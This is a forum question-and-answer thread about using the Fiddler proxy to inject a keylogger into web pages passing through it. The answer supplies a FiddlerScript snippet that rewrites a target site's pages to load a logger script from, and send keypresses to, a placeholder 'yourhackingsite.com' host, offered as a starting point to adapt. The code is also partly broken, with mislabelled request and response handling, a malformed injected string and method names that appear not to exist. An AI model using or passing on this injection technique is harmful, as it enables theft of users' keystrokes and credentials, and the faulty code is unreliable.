Can we intercept the web traffic using Fiddler and inject a functionality such as key logger before the request being made to the server ?
Asked
Active
Viewed 504 times
0
-
Do you want to log all keyboard interactions with the website? – Arminius Jan 18 '17 at 23:04
-
Yes. I need to log all keyboard interactions – Adrian Gilbert Jan 18 '17 at 23:25
1 Answers
1
Yes you can do this.
First of all you need to add the fiddler extension called Fiddler script. This allows you to handle Fiddler events such as OnBeforeRequest, OnBeforeResponse etc..
Since you need to intercept the traffic on request, you need to intercept the OnBeforeRequest event.
Following is a sample code that you can use to achieve this using fiddler script. Please note that you will not be able to achieve exactly what you need from this script , but use it as a startup and modify according to your need.
if (oSession.HostnameIs("www.yourtargetsite.com") && oSession.HTTPMethodIs("POST")) // or what ever your web method
{
oSession.utilDecodeResponse();
var body = System.Text.Encoding.UTF8GetString(oSession.responseBodyBytes); // grab the request body here
var logger = '<script src="http://yourhackingsite.com/logger.js"></script>';
logger += '<script>destination=http://yourhackingsite.com/LogKeyPress?key=";</script>';
body = body.replace("<head>",logger + "</head>");
oSession.utilDecodeResponseBody(body); // inject your custom altered body
}
user3496510
- 1,257
- 2
- 12
- 26